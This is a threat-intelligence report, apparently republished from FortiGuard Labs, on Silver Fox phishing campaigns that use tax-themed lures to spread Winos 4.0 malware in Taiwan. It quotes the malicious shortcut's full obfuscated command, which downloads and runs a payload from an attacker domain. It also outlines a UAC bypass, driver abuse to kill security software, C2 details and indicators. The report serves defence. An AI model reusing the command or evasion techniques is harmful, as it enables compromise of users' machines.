FortiGuard Labs recently observed several targeted phishing campaigns in Taiwan that use themes designed to exploit local business processes. These campaigns disseminate Winos 4.0 (ValleyRat) and subsequent malicious plugins through weaponized attachments or embedded links. The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.
|
Affected Platforms: Microsoft Windows Impacted Users: Microsoft Windows Impact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks Severity Level: High |
The Labs’ analysis of domain registration data reveals that attackers use a rotating set of domains and cloud services to host and distribute malware. The highly volatile nature of this infrastructure renders traditional, static domain blocking insufficient as a primary defense. Over the past two months, analysts have identified various delivery techniques, including malicious LNK files used for a downloader, DLL sideloading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using "wsftprm.sys.” The following sections provide technical details and the associated activities of Silver Fox.[1]Figure 1 Attacker’s domain
Campaign 1 Malicious LNK via Tax-Themed Phishing - The first campaign leverages a tax-themed lure to deceive users into executing a multi-stage infection chain. The attack begins with a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.Figure 2 Archive contents with LNK and social-engineering decoys
The LNK file uses a relative path to invoke the system command processor:..\..\..\..\Windows\System32\cmd.exe. By calling cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload while evading detection
Arguments
/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & %windir%\System32\DeviceCredentialDeployment.exe & Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & %public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe h^tt^p^s/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe
This script first creates a working directory at %public%\501. It then performs system binary masquerading by copying the legitimate system utility curl.exe to this new directory and renaming it to url.exe to bypass simple filename-based monitoring. The renamed file was then used to download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn. During this process, the script also triggers DeviceCredentialDeployment.exe to maintain the appearance of normal system activity.
Figure 3 The downloaded executable
Once the downloaded installer “64位安装包_特別版” is executed, it extracts resources by locating an embedded executable in the resource section named “EXPAND.” This embedded payload is extracted and written to the local path C\ProgramData\Golden. This stage serves as the foundation for later deployment of Winos 4.0 (ValleyRat) and for loading the driver for defensive evasion.
Figure 4 The resources of the downloaded executable
Fortinet will go through the entire execution of Winos 4.0 in a later section.
Campaign 2 DLL-sideloading via Tax or E-invoice Phishing
The second campaign involves distributing various forged Ministry of Finance documents via phishing emails. One technique leverages the URL hxxp//taxfnat[.]tw/ to impersonate an official Taiwanese domain, while actually redirecting victims to a China-based cloud service at hxxps//twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar to download a compressed archive.
Figure 5 Tax-themed phishing
Another variation is to send the e-invoice via email. It displays the link as hxxps//www.einvoice. nat.gov[.]tw/, though it actually connects to hxxps//njhwuyklw[.]com/ that leads to the cloud download path hxxps//sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar.
Figure 6 E-invoice phishing mail
In the past two months, the downloaded archives have shifted strategy, moving away from using shortcut files (LNK) as intermediate downloaders, which would otherwise result in a single malicious execution file. Instead, the attacker delivers an archive containing a DLL that is sideloaded through a legitimate application. This campaign uses the same method for loading the malicious driver as the first wave and connects to the same C2 address.
Figure 7 The execution file and the malicious DLL file
In this campaign, the PDB path within the malicious DLL is C\Users\Administrator\Desktop\大馬專案(二)\x64\Release\DLL.pdb. This distinct project name, "大馬專案(二)," suggests that the Silver Fox group has organized its operations into projects with specific names. Through this string, we tracked another operation utilizing a legitimate file named 綜合所得稅電子結算申報繳稅.exe for DLL sideloading, though the C2 infrastructure for that campaign has migrated to 154[.]91.64.246. These observations indicate that the attack campaign is likely to continue evolving.
Final Payload Winos 4.0 (ValleyRat) - Before initiating its core functions, it calls RunUAC() to ensure it is operating within a high-integrity environment. This process begins with a dynamic privilege check using CheckAdminPrivileges. If the process already possesses administrative rights, it bypasses further escalation to minimize system noise. Otherwise, it calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking. By leveraging whitelisted system binaries, computerdefaults.exe can elevate its thread to administrator level without triggering a UAC prompt.
Figure 8 Bypass UAC
Its data fields contain numerous Base64-encoded strings used to load drivers and target security software. The core driver involved is wsftprm.sys (File Description Topaz OFD - PM), a 64-bit, validity-signed Windows kernel-mode driver (version 2.0.0.0). To load this driver, the malware performs a Bring Your Own Vulnerable Driver (BYOVD) attack by dynamically obtaining Native APIs from ntdll.dll, such as RtlInitUnicodeString, NtLoadDriver, and RtlAdjustPrivilege, which allow it to bypass standard service monitoring.
Figure 9 The extracted driver
It also queries registry values for VulnerableDriverBlocklistEnable under SYSTEM\CurrentControlSet\Control\CI\Config and the backup path ControlSet001. Depending on the system's defense state, it dynamically adjusts its registry loading paths. In these steps, analyst also found that error messages are encoded in Simplified Chinese (GBK).
Figure 10 Checks the register’s setting
Once kernel privileges are obtained through wsftprm.sys, the malware enters a monitoring loop to cross-reference active processes against a hardcoded list of security products. The target list includes ZhuDongFangYu.exe, 360tray.exe, 360sd.exe, HipsDaemon.exe, HipsMain.exe, HipsTray.exe, wsctrlsvc.exe, SecurityHealthHost.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, MpDefenderCoreService.exe, 2345SoftmgrSvc.exe, 2345SoftmgrDaemon.exe, 2345SoftMgr.exe, MSPCManager.exe, MSPCManagerService.exe, smartscreen.exe, MsMpEng.exe, NisSrv.exe, wsc_proxy.exe, wsccommunicator.exe, AvastSvc.exe, bdservicehost.exe, AVGSvc.exe, 360rps.exe, 360rp.exe, qmbsrv.exe, QQPCTray.exe, QQPCRTP.exe, uiWinMgr.exe, uiSeAgnt.exe, PtSessionAgent.exe, PtWatchDog.exe, PtSvcHost.exe, AMSPTelemetryService.exe, unsecapp.exe, uiWatchDog.exe, coreFrameworkHost.exe, coreServiceShell.exe, TmsaInstance64.exe, and ConfigSecurityPolicy.exe.
This list covers a wide range of protection tools, including Microsoft Defender, Trend Micro, Symantec, and security suites such as HuoRong and 360. Terminating these processes achieves a clean environment for Winos 4.0 to persist, escalate privileges, and maintain remote control without interference.
Figure 11 Targeted list in double Base64 encoding
Winos 4.0 hides its C2 address, 47[.]76 [.]86 [.]151, using Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==). After verifying the system version, it connects to its C2 to load the core component, 上线模块.dll (online module).
Figure 12 C2 connection and the downloaded online module
It then downloads other plugins and 登录模块 (login module), and stores them directly in the registry, allowing them to be loaded into memory without writing physical files to disk. The specific plugins identified in this campaign include 文件管理, 高速屏幕, 娱乐屏幕, 差异屏幕,and 系统管理. All plugins support file management, screen capture, remote control, and system management.
Figure 13 The modules saved in the registry
Investigation and Attribution - Based on similar file path patterns, analysts identified a related archive hosted at
hxxps//twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z.
Reseacher’s tracking confirms that campaigns dating back to January 2026 utilize the same C2, 47[.]76[.]86[.]151.
Further analysis of domain registration data revealed a consistent registrant name, "李积强," and an associated email address, gongluliu@zju.edu[.]cn, which also appeared in the text file from the first campaign.
Also, the LNK metadata contains the MachineID “desktop-t3n3m3q.” This specific ID was observed in Silver Fox APT activity in August 2025, during an environmental check routine. This strongly suggests that the identifier belongs to systems used by the attackers during malware development. Given the identical driver-abuse techniques and overlapping infrastructure, analysts assess with high confidence that these campaigns are the work of the same specialized subgroup within Silver Fox.
Conclusion - Since last year, FortiGuard Labs has exposed multiple operations involving Winos 4.0 (ValleyRat), revealing a persistent threat actor specifically targeting organizations across Asia. This group demonstrates a high level of sophistication in designing localized phishing lures, often registering domains that appear to be related to country-specific text to enhance the perceived legitimacy of their tax-themed and official document decoys.
The technical evolution of this group is evident in their shift toward memory-resident execution for additional plugins, leaving minimal physical footprints on the local disk. The exposure of internal project names, such as 大馬專案, alongside consistent development machine identifiers, indicates a well-organized operation with a mature toolset and structured planning. As this threat actor continues to refine its evasion techniques and infrastructure, users and organizations must remain highly vigilant. It is critical to treat any documents or links from non-trusted sources with extreme caution to prevent infection by this evolving threat.
IOCs
Domains
bqdrzbyq[.]cn
taxfnat[.]tw
njhwuyklw[.]com
twtaxgo[.]cn
taxhub[.]tw
taukeny[.]com
taxpro[.]tw
lmaxjuyh[.]cn
tkooyvff[.]cn
etaxtw[.]cn
twswsb[.]cn
IP
47[.]76[.]86[.]151
URLs
hxxps//twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps//sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps//twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z
SHA256
64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a Setup.exe
156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe AISafeSDK64.dll
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators-of-compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting https//www.redskyalliance.org/
- Website https//www.redskyalliance.com/
- LinkedIn https//www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings
REDSHORTS - Weekly Cyber Intelligence Briefings
https//register.gotowebinar.com/register/5207428251321676122
[1] https://www.fortinet.com/blog/threat-research/massive-winos-40-campaigns-target-taiwan?lctg=141970831
Comments